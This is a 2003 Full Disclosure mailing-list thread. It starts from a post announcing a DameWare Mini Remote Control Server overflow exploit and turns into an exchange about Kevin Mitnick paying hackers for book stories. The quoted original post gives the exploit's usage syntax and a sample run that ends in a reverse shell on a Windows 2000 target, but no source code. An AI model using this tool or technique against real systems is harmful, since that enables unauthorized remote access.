Full Disclosure mailing list archives
Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
From: Jelmer <jkuperus () planet nl>
Date: Sat, 20 Dec 2003 03:03:53 +0100
In that case you probably will want to update your site http://www.defthi.com/main/CallforHackers.html since it mentions another arangement ----- Original Message ----- From: "Kevin Mitnick" <kmitnick () defthi com> To: "'Jelmer'" <jkuperus () planet nl>; "'Adik'" <netninja () hotmail kg>; <full-disclosure () lists netsys com>; <bugtraq () securityfocus com> Sent: Saturday, December 20, 2003 1:56 AM Subject: RE: [Full-disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
The difference is that I'm offer a $500 for the best story of a single
hack,
and I'm willing to pay $200 for each story that makes the final draft. Markoff would not agree to pay one dime. Cheers, Kevin Mitnick Check out http://www.zdnet.com.au for the story -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Jelmer Sent: Friday, December 19, 2003 4:03 PM To: Kevin Mitnick; 'Adik'; full-disclosure () lists netsys com; bugtraq () securityfocus com Subject: Re: [Full-disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit If this is legit from a /. interview : --snip-- John Markoff had first libeled me in his book, Cyperpunk, which he co-authored with his former wife, Katie Hafner. In and around 1990,
Markoff
and Hafner contacted me to request my participation for a book about three hackers, including myself. In considering their request, I asked about
their
budget to compensate me for my time and/or life story rights. Both Markoff and Hafner were unwilling to compensate me as a source, because it was unethical. I explained that it was unethical for me to give them my story for free. We were at an impasse --snip-- from the site : --snip-- If your story makes it into the book, you'll receive a free copy of my
first
book, The Art of Deception, plus a rare Advanced Reader's Copy of the new one with your story in it -- both signed by me with a personal inscription to you in your real name or your handle or pseudonym. --snip-- Thats definatly more ethical ;) ----- Original Message ----- From: "Kevin Mitnick" <kmitnick () defthi com> To: "'Adik'" <netninja () hotmail kg>; <full-disclosure () lists netsys com>; <bugtraq () securityfocus com> Sent: Saturday, December 20, 2003 12:30 AM Subject: RE: [Full-disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow ExploitHi all! I'm sorry for my absence from the list for the past few months, but I
have
been very busy traveling outside the US, and my mail account was experiencing problems. Now that I am receiving the messages again, I
have
been playing "catch up," by reading the old posts. I do have some good news, and was hoping that some of you might be able
to
assist me. I have been commissioned by Wiley & Sons to write a secondbook,which is tentatively titled, "The Art of Intrusion." This book will chronicle detailed accounts of real, untold hacks by the perpetrators
who
did it, and I will provide a security analysis and described how theattackcould be mitigated/prevented in today's environment. I am going to tellthestory from the perpetrator's stance, not just from research obtained
from
law enforcement officials and records. I am looking for former/retired hackers that would be willing to tell methedetails of their sexiest hack. I am not interested in the
run-of-the-mill
attacks such as, exploiting RPC DCOM, but rather creative ones that incorporated technical, physical and/or social engineering aspects. I am offering $500 for the most provocative story that makes it into the book, and if the person wishes, we can protect their anonymity by the
use
ofa handle. All contributors selected for the book, will receive a copy
of
both books autographed by the authors. I should have more information up on FreeKevin.com today, as well as DefensiveThinking.com. If someone would like to contact me with a storyora possible lead on a storyteller, please write to me at hacks () defensivethinking com, or call at (310)689-7229. I would
appreciate
any assistance you can offer. All my best, Kevin Mitnick -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Adik Sent: Friday, December 19, 2003 8:38 AM To: full-disclosure () lists netsys com; bugtraq () securityfocus com Subject: [Full-disclosure] [Exploit]: DameWare Mini Remote Control
Server
Overflow Exploit DameWare Mini Remote Control Server Exploit C:\xploits\dmware>dmware ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik netmaniac[at]hotmail.KG )- - Versions vulnerable: <= DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort> eg: dmware 10.0.0.1 6129 10.0.0.2 21 C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53 ...oO DameWare Remote Control Server Overflow Exploit Oo... -( by Adik netmaniac[at]hotmail.KG )- - Versions vulnerable: <= DWRCS 3.72.0.0 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1 [*] Target IP: 192.168.63.130 Port: 6129 [*] Local IP: 192.168.63.1 Listening Port: 53 [*] Initializing sockets... [ OK ] [*] Binding to local port: 53... [ OK ] [*] Setting up a listener... [ OK ] OS Info : WIN2000 [ver 5.0.2195] SP String : Service Pack 3 EIP: 0x77db912b (advapi32.dll) [*] Constructing packet for WIN 2000 SP: 3... [ OK ] [*] Connecting to 192.168.63.130:6129... [ OK ] [*] Packet injected! [*] Connection request accepted: 192.168.63.130:1056 [*] Dropping to shell... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>exit exit [x] Connection closed. C:\xploits\dmware> ------ cheerz, Adik _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Adik (Dec 19)
- Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Gregory A. Gilliss (Dec 19)
- RE: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Kevin Mitnick (Dec 19)
- Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Jelmer (Dec 19)
- RE: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Kevin Mitnick (Dec 19)
- Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Jelmer (Dec 19)
- Re: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit Jelmer (Dec 19)